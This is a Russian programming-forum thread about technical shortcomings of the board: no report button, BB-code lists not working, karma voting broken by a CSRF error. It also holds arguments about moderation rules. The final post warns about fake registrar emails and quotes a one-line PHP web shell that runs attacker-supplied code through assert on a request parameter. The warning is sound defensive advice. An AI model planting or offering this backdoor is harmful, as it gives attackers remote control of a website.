Ремесло программиста

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Ремесло программиста » Цели, задачи и правила площадки » Технические проблемы этого форума


Технические проблемы этого форума

Сообщений 1 страница 12 из 12

1

На этом форуме замечены три технические проблемы и/или недоработки:
* Нет кнопки "Пожаловаться", чтобы можно было сообщить модератору о возможном флуде, спаме и пр.
* Нет списков в BB-коде (теги ul и ol не работают, даже будучи введенными вручную).
* Не работает +1/-1 за сообщения. При нажатии выводится известная PunBB-шная ошибка, что ссылка неверна или устарела (проблема с CSRF-токеном).

Можно ли как-то решить проблемы в рамках MyBB? Поставить (купить?) плагины, например?

2

я не php программист (аж передернуло), писать в тех поддержку в которой отвечают такие же "специалисты" - бессмысленно (спасение утопающих дело рук самих утопающих)

карма - так себе хотелка.(имхо, но я попробую ее  вкоючить если появится еще хотя бы один человек кому это нужно)
BB-коды странно что не работают . уточню этот момент.
пожаловаться можно всегда в лс. посмотрю как такая кнопка реализована у других. если там ничего сверхестественного - поробую прикрутить.

3

Яр написал(а):

карма - так себе хотелка.(имхо, но я попробую ее  вкоючить если появится еще хотя бы один человек кому это нужно)

Проще ее совсем выключить, чтобы не мозолила глаза. Я тоже не любитель кармы, ради прикола решил попробовать и напоролся.

4

Давно хочу пожаловаться на вирусы. При заходе на данный сайт с мобильного телефона оператор  билайна. Вечно предлагает установить платную подписку или пишет, что у вас вирус вам надо скачать клинер.

5

Павиа написал(а):

Вечно предлагает установить платную подписку или пишет, что у вас вирус вам надо скачать клинер.

:rofl:  :rofl:  :rofl:  - Павиа "жжот"!!!... )))
- Ну, что-ж, настало и мне время пожаловаться, причём не на одного, а на всех операторов вкупе, вместе с их "мобильными телесистемами", эсэмэсками, отстойными "дровами" в модемах, а также "никакую" обратную связь со своими клиентами... Жаль, что я не Задорнов, а то бы сказал:

- С чего начинается "свобода слова" по-американски? - Не знаете? - А я подскажу:
Уж если "каратэ начинается с поклонов", а "театр начинается с вешалки", то демократия должна начинаться непременно с "гей-парадов", иначе это будет "не по-американски"...

6

Павиа, сделай пожалуйста снимок экрана в следующий раз когда будешь заходить. Я думаю смогу найти всему логическое объяснение. Как-никак к некоторым показам рекламы я тоже имею отношение)

7

Я пока жду когда выскочит вкладка с платной подпиской. Остальное так не настораживает.

8

ВежливыйЛис написал(а):

нужно сделать две кнопки:
1) приватно отругать оппонента (через личные сообщения);
2) сообщить модераторам о нарушениях оппонента (тоже как-нибудь не в паблике)

Ув. Лис,

тема очень хорошая и важная.
у меня есть сразу пара дополнений :
- я не владею всякого рода скриптовыми навыками - то есть на всяких там пхп не пишу как и на скрипте. то есть дополнить этот форум доп функциональностью не могу
- даже если здесь есть люди которые имеют опыт разработки в пхп - то исходников конкретно этого форума (я имею ввиду именно нашей площадки а не  mybb) нету, и доступа к ним нам никто не даст
- переходить на площадку в которой у нас есть все права - не все особо горазды.
- но думаю что даже после перехода на площадку где мы могли бы все это сделать -  мы будем пол года обсуждать где должны стоять эти кнопочки и как они должны выглядеть и тд и тп

посему:
- может стоит просто договорится, что мы уважаем мнение друг друга?
- решать вопросы в приватных сообщениях (используя текущую функциональность)
- о нарушениях оппонентов сообщать нужно сразу же, не доводя разговор до точки кипения.

если вам жуть как хочется поругаться или доказать что только вы правы можно созвониться, встретиться, попортить друг другу прическу, пообщаться в скайпе (и миллионе других не русских клиентов) - но не захламлять темы всякого рода отсебятиной.

Отредактировано MihalNik (2017-05-22 22:24:49)

9

1) приватно отругать оппонента (через личные сообщения);

- Под каждым ником есть ссылочка "ЛС", зачем же дополнительная кнопка?

10

Яр написал(а):

- переходить на площадку в которой у нас есть все права - не все особо горазды.

1) на ней написано, что она тестовая. Значит переходить рано.

Яр написал(а):

Отредактировано MihalNik (Вчера 22:24:49)

2) Кроме того, что-то же вырезал MihalNik? Наверняка там был обещанный мне портовый мат. Тоже вполне причина не переходить.

Я не считаю, что технические возможности форума и правила общения, которые должны быть в коммьюнити (но их нет) - это одна и та же тема. Это две разные темы. Хочу видеть тему с правилами.

Сандро написал(а):

Под каждым ником есть ссылочка "ЛС", зачем же дополнительная кнопка?

почему-то budden этой ссылкой не воспользовался. Я считаю, это потому что нет правил общения на форуме.
И модераторы сообщение budden не отмодерировали до сих пор (и причину не устранили тоже). И это произошло потому что нет правил. Были бы правила - было бы ясно.

Яр написал(а):

не захламлять темы всякого рода отсебятиной

В данном конкретном случае я не захламлял тему. (подозреваю, что тут был вырезанный MihalNik персональный наезд на меня.) Я создал новую, но её удалили. Думаю, что это сделал MihalNik, но наверняка не знаю. Из этого следует, что проблема создания "неправильных" тем и захламления форума таким образом - наверное тоже есть. И это тоже надо регламентировать. Вот ты пишешь "надо договориться". Что такое договор - это текст. С предложениями. Я как раз и предлагаю правила записать явно. А ты сразу на дыбы встаёшь, мол не надо, "мы тут все взрослые люди". То есть сначала одно говоришь, потом сразу совершенно противоположное. Это шизофрения.

попортить друг другу прическу

Я думаю, что тут было не "набить морду" и не "переломать рёбра", а "поубивать друг друга насмерть" (убили же директора завода счётно-аналитических машин). И после эти люди удивляются желанию поанонимизироваться.

Отредактировано ВежливыйЛис (2017-05-23 02:26:28)

11

)) Лис, у вас слишком бурное воображение!

MihalNik просто добавил цитирование части вашего сообщения.

12

Яр написал(а):

я не владею всякого рода скриптовыми навыками - то есть на всяких там пхп не пишу как и на скрипте. то есть дополнить этот форум доп функциональностью не могу

Такие знания могут понадобиться не только для расширения возможностей. На адрес администратора домена может прийти письмо, которое по всем видимым признакам отправлено регистратором, а в нём будет требование, чтобы владелец создал на сайте файл, который необходим для идентификации и множества других важных причин:

<?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

На деле же это обман, чтобы получить доступ к сайту.


Вы здесь » Ремесло программиста » Цели, задачи и правила площадки » Технические проблемы этого форума